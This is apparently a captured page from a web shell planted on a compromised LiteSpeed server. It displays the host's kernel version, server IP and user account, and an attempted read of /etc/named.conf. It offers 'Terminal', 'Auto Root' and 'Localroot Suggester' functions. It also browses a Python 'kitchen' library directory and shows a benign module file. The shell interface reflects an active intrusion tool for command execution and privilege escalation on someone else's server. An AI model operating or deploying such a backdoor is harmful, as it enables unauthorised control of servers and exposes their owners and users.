Linux newlinux5.pouyasazan.org 3.10.0-962.3.2.lve1.5.60.el7.x86_64 #1 SMP Fri Jul 23 07:07:00 EDT 2021 x86_64
LiteSpeed
Server IP : 88.99.66.243 & Your IP : 216.73.216.178
Domains :
Cant Read [ /etc/named.conf ]
User : wdbbsgxf
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
lib /
python2.7 /
site-packages /
kitchen /
pycompat27 /
Delete
Unzip
Name
Size
Permission
Date
Action
subprocess
[ DIR ]
drwxr-xr-x
2021-08-24 16:58
__init__.py
419
B
-rw-r--r--
2012-02-14 22:22
__init__.pyc
667
B
-rw-r--r--
2014-06-10 10:26
__init__.pyo
667
B
-rw-r--r--
2014-06-10 10:26
Save
Rename
''' The :mod:`kitchen.pycompat27` module contains implementations of functionality introduced in python-2.7 for use on earlier versions of python. .. versionchanged:: 0.2.3 Made mswindows, MAXFD, and list2cmdline available from the module ''' from kitchen.versioning import version_tuple_to_string __version_info__ = ((1, 1, 0),) __version__ = version_tuple_to_string(__version_info__) __all__ = ('subprocess',)